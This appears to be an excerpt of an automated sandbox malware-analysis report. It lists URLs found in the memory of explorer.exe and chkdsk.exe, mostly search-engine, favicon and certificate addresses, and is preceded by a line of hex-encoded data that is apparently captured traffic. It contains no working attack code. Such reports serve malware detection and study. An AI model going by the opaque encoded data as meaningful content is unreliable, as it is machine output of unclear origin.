74 70 64 7e 4b 64 66 6d 2d 44 6e 48 75 72 4c 6a 71 36 31 67 75 4b 61 42 65 49 4b 65 39 62 42 6c 7a 71 71 66 36 6c 75 6c 45 63 7a 72 72 6e 4b 57 34 67 37 78 45 72 36 73 72 49 6b 5a 79 48 68 47 32 77 51 42 63 67 74 63 32 49 55 68 30 38 4b 50 56 42 4a 37 44 49 71 44 56 4f 70 38 5f 66 7a 75 6d 45 56 7e 53 43 6d 28 6b 6c 43 34 4b 4c 53 7e 69 77 78 46 2d 74 4c 72 66 59 54 79 66 32 6c 5a 4e 47 4e 6a 56 6b 47 79 4c 37 58 4b 67 7e 73 6e 45 4f 63 57 4e 42 38 79 79 35 4b 68 44 68 61 44 6e 37 43 4e 4e 6a 45 4a 4e 4a 65 7e 50 41 49 50 58 79 59 62 49 45 71 46 4a 6c 78 7e 54 4a 35 78 56 69 32 4c 39 55 39 62 42 62 7a 33 64 64 6f 4a 53 30 34 4f 73 54 36 72 46 78 5a 54 41 63 58 4f 4d 76 51 54 79 49 61 73 79 45 4a 66 76 77 6c 75 72 42 4d 53 34 69 39 61 4a 39 50 42 38 4e 35 6f 6f 79 69 6c 71 65 79 35 53 78 6e 5a 33 47 61 54 69 54 48 75 43 41 4b 75 48 32 33 4e 76 5a 33 7a 79 71 36 4b 7a 63 41 50 67 31 6c 73 7a 28 42 6a 48 76 59 70 77 5a 6e 58 39 74 59 6c 4f 67 49 79 67 72 51 46 47 33 70 45 63 48 47 4c 42 59 38 4e 46 71 55 4b 55 52 69 6e 2d
          Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0B
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0N
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.thawte.com0
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000002.2382532795.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2207019082.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
